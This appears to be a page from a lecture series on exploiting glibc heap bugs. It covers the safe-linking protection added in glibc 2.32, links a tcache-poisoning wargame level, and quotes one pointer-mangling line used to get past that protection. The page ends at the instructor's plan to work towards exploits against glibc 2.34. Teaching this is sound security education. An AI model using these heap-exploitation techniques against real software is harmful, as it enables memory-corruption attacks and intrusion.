Don't like this style? Click here to change it! blue.css
Take a look with me at: https://sourceware.org/git/?p=glibc.git;a=summary
This is the actively maintained glibc git repo, it is contributed to regularly. At this moment the major releases happen every 6 months.
These releases add security measures based on feedback, advice, and the pwn community.
Right now 2.34 is the latest stable release and 2.35 is under active development (an update 90 minutes ago in fact)
I have wrestled with how to walk you to the point that you can do a full-green exploit on the latest glibc versions.
The problem is that even my pwn environment is setup to 2.31.
I'd like to show you the interesting tcache/fastbin security measure they added in 2.32 which I can do in the following method:
https://wargames.ret2.systems/level/how2heap_tcache_poisoning_2.34
The interesting line is:
b[0] = (intptr_t)((long)target ^ (long)b >> 12);
The issues I've faced in prepping for that one line of code are the following:
I'd like us to do a full-green exploit on the latest glibc in the next week or 2.
But for now here is a "target practice" script (just a variation on the heap vuln playground)
I made it the PCP for today to run this target practice against glibc_2.34.
So the issue is that in 2.34 the nature of our targets changes and the nature of the protections changes.
I want to show you how to handle both but I can't in one go.
So here's my plan for the rest of the lectures in order to walk towards the goal: Full-green 2.34 exploits.
Let's do: